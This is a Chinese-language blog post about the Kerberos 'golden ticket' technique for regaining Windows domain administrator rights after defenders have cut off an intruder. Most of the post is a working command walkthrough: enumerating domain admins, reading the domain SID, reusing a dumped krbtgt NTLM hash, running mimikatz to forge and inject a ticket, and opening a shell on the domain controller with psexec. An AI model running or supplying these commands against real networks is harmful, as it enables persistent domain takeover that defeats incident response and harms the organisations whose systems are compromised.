0x00 廢話連篇

---

最近幾年很少搞內網滲透了，這幾年發展的快啊，看了A牛翻譯的<<Fireeye Mandiant 2014 安全報告 Part1>> ，發現趨勢都是powershell指令碼化了。想當年遇到的域控都是windows 2003的，找朋友要些vbscript指令碼自動化，然後那啥那啥的。現在搞域除了前段時間出的MS14068，還有龍哥翻譯的（/papers/?id=576）,不知道還有什麼新方法，心中還有激情，如果想交流的朋友，可以加我聊聊。

0x01 金之鑰匙

---

我原來發過一個微薄說

這就是我說的金之鑰匙，利用這個的條件是你在原來搞定域控的時候，已經匯出過域使用者的HASH，尤其是krbtgt 這個使用者的。但是在你在內網幹其他事情的時候，活兒不細，被人家發現了，你擁有的域管理員許可權掉了，你現在還有一個普通的域使用者許可權，管理員做加固的時候又忘記修改krbtgt密碼了（很常見），我們還是能重新回來，步驟如下：

要重新拿回域管理員許可權，首先要先知道域內的管理員有誰

C:\Users\hydra>net group "domain admins" /domain

我這裡的實驗環境，透過截圖可以看到域管理員是administrator

我還要知道域SID是啥

C:\Users\hydra>whoami /user

我的域SID是 S-1-5-21-3883552807-251258116-2724407435

還有最重要的krbtgt使用者的ntlm雜湊，我原來匯出的是

krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

然後該用神器mimikatz出場了，依次執行

mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt

到現在，我們又重新擁有域管理員許可權了，可以驗證下

E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd

0x02 後話閒扯

---

呃，感覺這個方法比/tips/?id=9297這個方便些，文章寫了好久了，一直湊不出更多的字數，就沒發。。嗯。。。懶了。。